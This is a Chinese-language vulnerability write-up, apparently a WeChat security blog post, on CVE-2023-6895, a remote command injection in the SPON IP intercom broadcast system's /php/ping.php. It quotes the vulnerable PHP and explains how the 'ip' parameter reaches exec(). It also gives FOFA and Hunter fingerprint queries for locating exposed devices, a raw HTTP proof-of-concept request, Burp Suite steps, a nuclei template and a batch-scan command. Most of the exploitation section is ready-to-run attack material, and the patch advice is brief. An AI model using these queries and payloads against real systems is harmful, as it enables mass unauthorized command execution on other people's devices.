漏洞情报-世邦IP网络对讲广播系统远程命令执行漏洞CVE-2023-6895

漏洞详情：

世邦IP网络对讲广播系统3.0.3_20201113_RELEASE（HIK）中发现了漏洞。它被宣布为危急状态。此漏洞影响文件/php/ping. php的未知代码。使用输入netstat -ano操作参数jsondata[ip]会导致os命令注入。升级到4.1.0版本可以解决这个问题。建议升级受影响的组件。

影响范围

v3.0.3_20201113_RELEASE(HIK)

icon_hash=“-1830859634”

资产测绘

fofa：icon_hash="-1830859634"
鹰图：web.icon=="e854b2eaa9e4685a95d8052d5e3165bc"

漏洞所在代码：

header("Content-type: text/html; charset=GB2312");
$postData = $_POST['jsondata'];
if(isset($postData['ip']) && isset($postData['type'])){
     $type = $postData['type'];//类型
     $ip = $postData['ip'];//IP地址
     $arr = systemopr($type, $ip);
     $len = count($arr);
     for($i = 0; $i < $len; $i++){
          if(isset($arr[$i])){
               $arr[$i] = iconv('GB2312', 'UTF-8', $arr[$i]);//gb2312转换为utf-8
          }
     }
     $after = json_encode($arr);//转换成json
     echo $after;
}
function systemopr($type, $ip, $times=4){
     $info = array();     
     if (PATH_SEPARATOR==':' || DIRECTORY_SEPARATOR=='/'){
           //linux
           if($type == "0"){
               exec("ping -c $times $ip", $info);
           }else if($type == "1"){
               exec("traceroute -m $times -w 1 $ip", $info);
           }else{
               exec($ip, $info);
          }
     }else{
          //windows
          if($type == "0"){
               exec("ping $ip -n $times", $info);
          }else if($type == "1"){
               exec("tracert -h $times -w 1000 $ip", $info);
          }else{
               exec($ip, $info);
          }
     }
     return $info;
}

可以看到问题在systemopr()，发现当$postData{[}^{\prime }typ{e}^{\prime }]和$postData[‘ip’]存在值时，则会传入systemopr函数，通过exec()函数进行拼接命令执行，当$postData{[}^{\prime }typ{e}^{\prime }]等于0或1时，则代入指定代码段，执行指定命令。但$postData[‘type’]参数值不等于0和1时，可以不考虑参数闭合，直接可以通过$postData{[}^{\prime }i{p}^{\prime }]执行任意命令。而且恰巧$postData[‘type’]和$postData[‘ip’]的值都是POST传参可控的，导致我们可以执行任意系统命令。

漏洞利用

poc
POST /php/ping.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 45
Origin: 
Connection: close
Referer: http://xxx.xxx.xxx/html/system.html
X-Forwarded-For: 
jsondata[type]=3&jsondata[ip]=ipconfig

使用方法：

1、使用浏览器访问目标系统，并使用BurpSuite进行拦截抓包；2、拦截的GET请求包转换成POST包，并添加/php/ping.php地址，请求内容为：jsondata[type]=99&jsondata[ip]=ipconfig 其他内容不修改

3、Unicode编码转换。
## 漏洞修复建议
升级到4.1.0版本

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.spon.com.cn/

nuclei poc

id: CVE-2023-6895
info:
  name: 世邦IP网络对讲广播系统远程命令执行漏洞
  author: fgz
  severity: critical
  description: 世邦IP网络对讲广播系统，采用领先的IPAudio™技术，将音频信号以数据包形式在局域网和广域网上进行传送，是一套纯数字传输系统。它解决了传统对讲广播系统存在的传输距离有限、易受干扰等问题。世邦IP网络对讲广播系统3.0.3_20201113_RELEASE的/php/ping.php接口存在RCE漏洞。攻击者可以通过在受攻击系统上执行恶意命令，从而获取未授权的系统访问权限。
  metadata:
    max-request: 1
    fofa-query: icon_hash="-1830859634"
    verified: true
requests:
  - raw:
      - |+
        POST /php/ping.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
        Accept: application/json, text/javascript, */*; q=0.01
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest
        Connection: close
        
        jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains(body, 'IP')"

批量使用方法

nuclei -t CVE-2023-6895.yaml -l url.txt

感谢各位大佬们关注微信公众号-不秃头的安全，后续会坚持更新渗透漏洞思路分享、安全测试、好用工具分享以及挖掘SRC思路等文章，同时会组织不定期抽奖，希望能得到各位的关注与支持。